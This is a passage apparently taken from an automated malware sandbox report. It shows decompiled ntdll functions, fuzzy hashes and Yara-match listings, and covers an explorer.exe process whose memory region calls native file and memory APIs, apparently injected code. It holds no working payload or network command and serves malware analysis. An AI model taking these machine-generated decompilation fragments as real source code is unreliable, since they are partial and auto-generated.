					return L01004620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}

0x010136d2
0x010136e8
0x010136d4
0x010136e5
0x010136e5

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction ID: ab2a33321f78f00134e4d29cd7feafe07ef84771863e7d236c0a7935e39da586
Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction Fuzzy Hash: 66C02B74150840FBE7165F30CE00F147294F704A31F6407A47320894F0E56C9C00D104

Uniqueness

Uniqueness Score: -1.00%

Function 01007D50, Relevance: .0, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01007D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}

0x01007d56
0x01007d5b
0x01007d60
0x01007d5d
0x01007d5d
0x01007d5d

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction ID: 3dcc8d537ab351f164720f7ae8eca209885483aef1e84d13dfe21feb9185f5d0
Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction Fuzzy Hash: BBB092353019408FDE57EF18C080B1533F4BB44A40F8400D0E440CBA21D229E9008900

Uniqueness

Uniqueness Score: -1.00%

Function 01012ACB, Relevance: .0, Instructions: 5
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01012ACB() {
				void* _t5;

				return E00FFEB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
			}

0x01012adc

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction ID: 07779fabfb211d0a1cde484bb93d5badeaeed673af4d4a9e0bd05062bf9814c3
Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction Fuzzy Hash: 2FB01232C10444CFCF02EF40CA10B297332FF40750F054490A20167931C22CAC11DB40

Uniqueness

Uniqueness Score: -1.00%

Function 01029520, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25c0706e37584b7939bdd80090be445a286f52a6fd7aebdc3b9e763a35f5feda
Instruction ID: bbef87c4316f879fd00348d76f9d1b8f1a5c36a0c2f6e63e3ffbc24ec158a5b7
Opcode Fuzzy Hash: 25c0706e37584b7939bdd80090be445a286f52a6fd7aebdc3b9e763a35f5feda
Instruction Fuzzy Hash: 9D9002E1221145924500A299C404B0A4609A7E0242B91C016E1444560CC5658861A275

Uniqueness

Uniqueness Score: -1.00%

Function 0102AD30, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47c1f9eff866176a8ead9f3e3b7e16ab9a7e8897e7339bb434f2425092edd2e6
Instruction ID: a201254f0c99b29d1d72efd8b068178cead1a28dd3ae6cdeb2617b805cd69fd6
Opcode Fuzzy Hash: 47c1f9eff866176a8ead9f3e3b7e16ab9a7e8897e7339bb434f2425092edd2e6
Instruction Fuzzy Hash: 9A900271A2500512914071998814646410AB7E0782B95C011A0904554CC9948A6563E1

Uniqueness

Uniqueness Score: -1.00%

Function 01029950, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: faf6143a9dfebfbfcadba53fce2dd97480f4bd434d01e77e5f0c9c8aeef8bbcb
Instruction ID: 445434661316b5bac21f645809d51336830627cc6d982003a9ecb48d0a02f0c1
Opcode Fuzzy Hash: faf6143a9dfebfbfcadba53fce2dd97480f4bd434d01e77e5f0c9c8aeef8bbcb
Instruction Fuzzy Hash: 879002A122140903D140659988046070109A7D0343F91C011A2454555ECA698C617275

Uniqueness

Uniqueness Score: -1.00%

Function 01029560, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c8a0e96e3ae77f5bc1475f4f368976bc5a59b2fffee53213d295685cacc53dc
Instruction ID: 01d690c2491289a16cefb2a75e89d65be9a500935ea5702fd1304b5c9513eb24
Opcode Fuzzy Hash: 2c8a0e96e3ae77f5bc1475f4f368976bc5a59b2fffee53213d295685cacc53dc
Instruction Fuzzy Hash: 21900265231005020145A599460450B0549B7D63923D1C015F1806590CC66188756361

Uniqueness

Uniqueness Score: -1.00%

Function 010299D0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93483d6a2618de7190ac9f488ee1bc92d3bf396ab5e9d0262d9b0b95b68f924a
Instruction ID: 19d8912fbd956ea94acd83a66d8cf87fa946021ffdbfb035dfc4fc78c2fccdc6
Opcode Fuzzy Hash: 93483d6a2618de7190ac9f488ee1bc92d3bf396ab5e9d0262d9b0b95b68f924a
Instruction Fuzzy Hash: F09002A123100542D104619984047060149A7E1242F91C012A2544554CC5698C716265

Uniqueness

Uniqueness Score: -1.00%

Function 010295F0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e469d562635e586c61fb23504879a98993cf1ab758cae2ac2605af7dc462061
Instruction ID: 65cbdb5b8abe911aaee432da30c98f13b03c306f08de652ad463e98c2e99572e
Opcode Fuzzy Hash: 1e469d562635e586c61fb23504879a98993cf1ab758cae2ac2605af7dc462061
Instruction Fuzzy Hash: 1590027122100D02D104619988046860109A7D0342F91C011A6414655ED6A588A17271

Uniqueness

Uniqueness Score: -1.00%

Function 01029820, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c0cd099be4b50891aa274334f9dbd51d5f3e7eb64bc30476b43aaa23f4185a8
Instruction ID: 13fff0bdcb069fef8d6b8a9808eb4ebe5d7da6ebb4d7974f9dcc40646a528cac
Opcode Fuzzy Hash: 3c0cd099be4b50891aa274334f9dbd51d5f3e7eb64bc30476b43aaa23f4185a8
Instruction Fuzzy Hash: 2D90027126100902D14171998404606010DB7D0282FD1C012A0814554EC6958A66BBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0102B040, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 499850189380c48b48b4810f1e0e8098d458b79e97eadc339855c3071291a351
Instruction ID: 2d6333bf46b0a442f38ef25943159c5b283a4a08f99eb7ac62a27797e6360de1
Opcode Fuzzy Hash: 499850189380c48b48b4810f1e0e8098d458b79e97eadc339855c3071291a351
Instruction Fuzzy Hash: 269002A1621145434540B19988044065119B7E13423D1C121A0844560CC6A88865A3A5

Uniqueness

Uniqueness Score: -1.00%

Function 010298A0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b970432eb44a64b7468df79c63a92d6111cc9c3c427807e8a015b1e009e4e836
Instruction ID: 36f380b874187825325f68b0b508708f7cdc7ecb5227265dc4c709009d7ec030
Opcode Fuzzy Hash: b970432eb44a64b7468df79c63a92d6111cc9c3c427807e8a015b1e009e4e836
Instruction Fuzzy Hash: B690026132100902D10261998414606010DE7D1386FD1C012E1814555DC6658963B272

Uniqueness

Uniqueness Score: -1.00%

Function 01029B00, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ef437f1eb8ad3f53df82fd98be10d11836c0f1736e04462f52036f6f8f21733
Instruction ID: de066ca831bea974e4b502f2359dd80ac8dbbf3fe7abe29be273ce9a2cb9ed43
Opcode Fuzzy Hash: 3ef437f1eb8ad3f53df82fd98be10d11836c0f1736e04462f52036f6f8f21733
Instruction Fuzzy Hash: 8990026126100D02D1407199C414707010AE7D0642F91C011A0414554DC656897577F1

Uniqueness

Uniqueness Score: -1.00%

Function 0102A710, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d15f1c3313029a03c0707caff2e9cc7c635c57b4de0ce1b36d129f664ba391b
Instruction ID: 3abd754c73ed82c0ecb0a3807f013ec05deaa5214c74db521d77937526971426
Opcode Fuzzy Hash: 6d15f1c3313029a03c0707caff2e9cc7c635c57b4de0ce1b36d129f664ba391b
Instruction Fuzzy Hash: CD900271321005529500A6D99804A4A4209A7F0342B91D015A4404554CC59488716261

Uniqueness

Uniqueness Score: -1.00%

Function 01029730, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ab11fa6ecf890e9d3f2b65de6d234d6d84f6a5c16e45d5b046a3c8186bbc1e7
Instruction ID: a0b96b9eef6f6a6f02e59979be703768a67cd350026d8c698c080111fd05b497
Opcode Fuzzy Hash: 3ab11fa6ecf890e9d3f2b65de6d234d6d84f6a5c16e45d5b046a3c8186bbc1e7
Instruction Fuzzy Hash: 6B90026162500902D140719994187060119A7D0242F91D011A0414554DC6998A6577E1

Uniqueness

Uniqueness Score: -1.00%

Function 01029760, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df40270e8e610e83362620f43771031d1facf7d1f6b4f96d73759cd44bff3c2e
Instruction ID: 343e2be6aa9f8bcd5cff015e85cfeb2408ff8f7409ce7c333c9f532a4dc8afd1
Opcode Fuzzy Hash: df40270e8e610e83362620f43771031d1facf7d1f6b4f96d73759cd44bff3c2e
Instruction Fuzzy Hash: B690027122100903D100619995087070109A7D0242F91D411A0814558DD69688617261

Uniqueness

Uniqueness Score: -1.00%

Function 01029770, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90846ec646525319f91e9e93f4b8bd1d642747ff14320bd62b79f2e3bb41a86a
Instruction ID: aac337c5de8b4efa4cf54b4d915773d55e78858876539a1ed8edeee03bffa42f
Opcode Fuzzy Hash: 90846ec646525319f91e9e93f4b8bd1d642747ff14320bd62b79f2e3bb41a86a
Instruction Fuzzy Hash: 8390026122504942D10065999408A060109A7D0246F91D011A1454595DC6758861B271

Uniqueness

Uniqueness Score: -1.00%

Function 0102A770, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a2663dffcf8762e23be70eb0d8b6fd4d96f6c94c4f8303e84da7d7c18f99a6f
Instruction ID: 9ac1a8b09035e0cc81290d581e2d974261327ce542baca8d2ff2612d245b3e60
Opcode Fuzzy Hash: 3a2663dffcf8762e23be70eb0d8b6fd4d96f6c94c4f8303e84da7d7c18f99a6f
Instruction Fuzzy Hash: 9590027522504942D50065999804A870109A7D0346F91D411A081459CDC6948871B261

Uniqueness

Uniqueness Score: -1.00%

Function 0102A3B0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb185b7fb2268bf07e6e9916a2bbc9de7139b91f14f2e89a75a3b0942f3de86d
Instruction ID: fc0602712ab44ef66cd6a9bb21d708f89c8d0e17c241f9f71251da78f653e115
Opcode Fuzzy Hash: eb185b7fb2268bf07e6e9916a2bbc9de7139b91f14f2e89a75a3b0942f3de86d
Instruction Fuzzy Hash: 2190027122144502D1407199C44460B5109B7E0342F91C411E0815554CC6558866A361

Uniqueness

Uniqueness Score: -1.00%

Function 01029FE0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef4fa326c516f3b80166cd6d9b7a62e8e731fe8440ef43f42ce29dbf4dfe57f2
Instruction ID: e25ecb83a1500eccf144bfd0bc48860dd863ee1d7ff29b980610c4b52bfde9f1
Opcode Fuzzy Hash: ef4fa326c516f3b80166cd6d9b7a62e8e731fe8440ef43f42ce29dbf4dfe57f2
Instruction Fuzzy Hash: 3690027133114902D1106199C4047060109A7D1242F91C411A0C14558DC6D588A17262

Uniqueness

Uniqueness Score: -1.00%

Function 01029A10, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db81c2131cc5d7569e2b941a66345877d83c0c683f156def2b021febb341f220
Instruction ID: 04e414bc2a472f68e78c80f94a84dbc839c1701b1bff6549e20b968d9b4f9133
Opcode Fuzzy Hash: db81c2131cc5d7569e2b941a66345877d83c0c683f156def2b021febb341f220
Instruction Fuzzy Hash: 1790027122140902D100619988087470109A7D0343F91C011A5554555EC6A5C8A17671

Uniqueness

Uniqueness Score: -1.00%

Function 01029610, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3bd53f3d76982ce81c50cdbdd97b48a5548e1c6f8c36993a5cfbb5a88164216b
Instruction ID: 7dedbcbf9af5667bd211eb4a070f9042a282fb26ef9c61fce3fcff3b030be0ab
Opcode Fuzzy Hash: 3bd53f3d76982ce81c50cdbdd97b48a5548e1c6f8c36993a5cfbb5a88164216b
Instruction Fuzzy Hash: 0F90027162500D02D150719984147460109A7D0342F91C011A0414654DC7958A6577E1

Uniqueness

Uniqueness Score: -1.00%

Function 01029650, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d56040d9bf4e343644818a4a20a613db49afd91fe8499f161e7e0f598d5ae0e3
Instruction ID: 32352129f9461d6858092b3a50f57e83c265fad49a09f1a75545861e4da16c90
Opcode Fuzzy Hash: d56040d9bf4e343644818a4a20a613db49afd91fe8499f161e7e0f598d5ae0e3
Instruction Fuzzy Hash: E890027122504D42D14071998404A460119A7D0346F91C011A0454694DD6658D65B7A1

Uniqueness

Uniqueness Score: -1.00%

Function 01029A80, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 817c2850f7ad0a9b403114d6d3a424fdc174293cdfcac5601bf01c557c455cd4
Instruction ID: 44afaef8620daec406fb5eab3b984d2dce80aa709e56c4c1ded2a508197b5748
Opcode Fuzzy Hash: 817c2850f7ad0a9b403114d6d3a424fdc174293cdfcac5601bf01c557c455cd4
Instruction Fuzzy Hash: 1890026122144942D14062998804B0F4209A7E1243FD1C019A4546554CC95588656761

Uniqueness

Uniqueness Score: -1.00%

Function 010296D0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a69f79b7b792bd2479ee4560fbafb4ea4b70b1c8a93bd60d6335fe16fee2df0
Instruction ID: 79815e2fc6dc23ff0ff904b6267ec1a968effc08295fb863cc57ffdcbe546b37
Opcode Fuzzy Hash: 5a69f79b7b792bd2479ee4560fbafb4ea4b70b1c8a93bd60d6335fe16fee2df0
Instruction Fuzzy Hash: FB90027122100D42D10061998404B460109A7E0342F91C016A0514654DC655C8617661

Uniqueness

Uniqueness Score: -1.00%

Function 01029670, Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: 63320afde319bd72aea9ba72a9a890aaf3ce4b5175db8d93795c45f68dcd5e5b
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 0107FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0107FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0102CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E01075720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E01075720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x0107fdda
0x0107fde2
0x0107fde5
0x0107fdec
0x0107fdfa
0x0107fdff
0x0107fe0a
0x0107fe0f
0x0107fe17
0x0107fe1e
0x0107fe19
0x0107fe19
0x0107fe19
0x0107fe20
0x0107fe21
0x0107fe22
0x0107fe25
0x0107fe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0107FDFA

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0107FE2B
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0107FE01

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 783ee843891b6faa291fa7dca412ef56f340233dc52d20569087e1e14c44ab77
Instruction ID: f31177dda8a7ad685a5369ec7a19e25fdb2cef152321fea1928542c7daaf626c
Opcode Fuzzy Hash: 783ee843891b6faa291fa7dca412ef56f340233dc52d20569087e1e14c44ab77
Instruction Fuzzy Hash: 00F0F632600602BFEA201A55DC02F67BF6AFB94B30F140315F668561D1DAA2F820D6F5

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: explorer.exe PID: 6224 Parent PID: 3388 explorer.exeCOMMON

Executed Functions

Function 030A9D60, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,030A4B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,030A4B87,007A002E,00000000,00000060,00000000,00000000), ref: 030A9DAD

Strings

.z`, xrefs: 030A9D9D, 030A9DA8

Memory Dump Source

Source File: 00000009.00000002.745639709.0000000003090000.00000040.00000001.sdmp, Offset: 03090000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: f4582175764c561d104e99447b76fc66f0b47ce1304513fa19caea61d2d415bb
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: 51F0B2B2205208ABCB48CF88DC84EEB77ADAF8C754F158248BA0D97240C630E811CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 030A9E10, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(030A4D42,5EB6522D,FFFFFFFF,030A4A01,?,?,030A4D42,?,030A4A01,FFFFFFFF,5EB6522D,030A4D42,?,00000000), ref: 030A9E55

Memory Dump Source

Source File: 00000009.00000002.745639709.0000000003090000.00000040.00000001.sdmp, Offset: 03090000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: 927f772a32d48b36eb9f496393487392df7a16d534ab1d9bef5dfd3fca86f8d6
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: 11F0A4B6200208ABCB14DF89DC80EEB77ADEF8C754F158248BA1DA7241D630E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 030A9F3A, Relevance: 1.5, APIs: 1, Instructions: 31memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,03092D11,00002000,00003000,00000004), ref: 030A9F79

Memory Dump Source

Source File: 00000009.00000002.745639709.0000000003090000.00000040.00000001.sdmp, Offset: 03090000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: c4f91ac108ea786bdf6572a3d8d80db9e01ca9a13952f635bfe9c1bf15fc8403
Instruction ID: 43ef156486aa8334da96720ba6830a9f6a102eee6628765ff04c076e927a6fb0
Opcode Fuzzy Hash: c4f91ac108ea786bdf6572a3d8d80db9e01ca9a13952f635bfe9c1bf15fc8403
Instruction Fuzzy Hash: 3AF0A0B52141496BDB04EF98DC88CE77BA9EF89264B05879DFD4C97202C635E851CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 030A9F40, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,03092D11,00002000,00003000,00000004), ref: 030A9F79

Memory Dump Source

Source File: 00000009.00000002.745639709.0000000003090000.00000040.00000001.sdmp, Offset: 03090000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: 4829f3af79cf717780ce4c9f5b9a4c6a6c9298508b4a60c20f72c168b90f8a2c
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: 6DF015B6200208ABCB14DF89DC80EEB77ADEF88650F118148BE08A7241C630F810CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 030A9E8C, Relevance: 1.5, APIs: 1, Instructions: 23nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(030A4D20,?,?,030A4D20,00000000,FFFFFFFF), ref: 030A9EB5

Memory Dump Source

Source File: 00000009.00000002.745639709.0000000003090000.00000040.00000001.sdmp, Offset: 03090000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: c9bf88d3ebf103c50743a87073904bcea18d4248caa37c7eff44a0380944b767
Instruction ID: befeea90cc16afd465be0a2beaf3fd58c43647827c749977157236a865061d05
Opcode Fuzzy Hash: c9bf88d3ebf103c50743a87073904bcea18d4248caa37c7eff44a0380944b767
Instruction Fuzzy Hash: 8FE08C366002146BD710EB98DC84EE77BA9EF48690F118064BA589B281C930E60086E0

Uniqueness

Uniqueness Score: -1.00%

Function 030A9E90, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(030A4D20,?,?,030A4D20,00000000,FFFFFFFF), ref: 030A9EB5

Memory Dump Source

Source File: 00000009.00000002.745639709.0000000003090000.00000040.00000001.sdmp, Offset: 03090000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: 7e93c3c1586dc32e62788c5f65b8e3d6447254d7f1523b9676fb0f7be54ef1c8
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: 81D012752003146BD710EBD8DC85ED7775CEF44650F154455BA585B241C530F50086E0

Uniqueness

Uniqueness Score: -1.00%

Function 04C695D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04C695DA

Memory Dump Source

Source File: 00000009.00000002.746780644.0000000004C00000.00000040.00000001.sdmp, Offset: 04C00000, based on PE: true

Associated: 00000009.00000002.747678270.0000000004D1B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.747697951.0000000004D1F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 82c1d116bf81ff76a062c9a70e7fc865745a0cd504fed6c3776a4ca978f5b6ea
Instruction ID: 68c9d6d0ddda9a6613a6189202ab7b65739cd40a8753afe4cfc04c2ce027a6e6
Opcode Fuzzy Hash: 82c1d116bf81ff76a062c9a70e7fc865745a0cd504fed6c3776a4ca978f5b6ea
Instruction Fuzzy Hash: 979002E120200103710571594414616450F9BE0245F61C021E1016590DC565D8917165

Uniqueness

Uniqueness Score: -1.00%

Function 04C69540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04C6954A

Memory Dump Source

Source File: 00000009.00000002.746780644.0000000004C00000.00000040.00000001.sdmp, Offset: 04C00000, based on PE: true

Associated: 00000009.00000002.747678270.0000000004D1B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.747697951.0000000004D1F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 99a1f8c0be40695d669fef42e239862f700d942833d2fcc9bd245eef2995f6fe
Instruction ID: 9ba65f17e253b2ed45ba6a4b64e59e89b7399f9c1d42f0f74480f4107091113d
Opcode Fuzzy Hash: 99a1f8c0be40695d669fef42e239862f700d942833d2fcc9bd245eef2995f6fe
Instruction Fuzzy Hash: FB9002A5211001033105A5590704507054B9BD5395761C021F1017550CD661D8616161

Uniqueness

Uniqueness Score: -1.00%

Function 04C696D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04C696DA

Memory Dump Source

Source File: 00000009.00000002.746780644.0000000004C00000.00000040.00000001.sdmp, Offset: 04C00000, based on PE: true

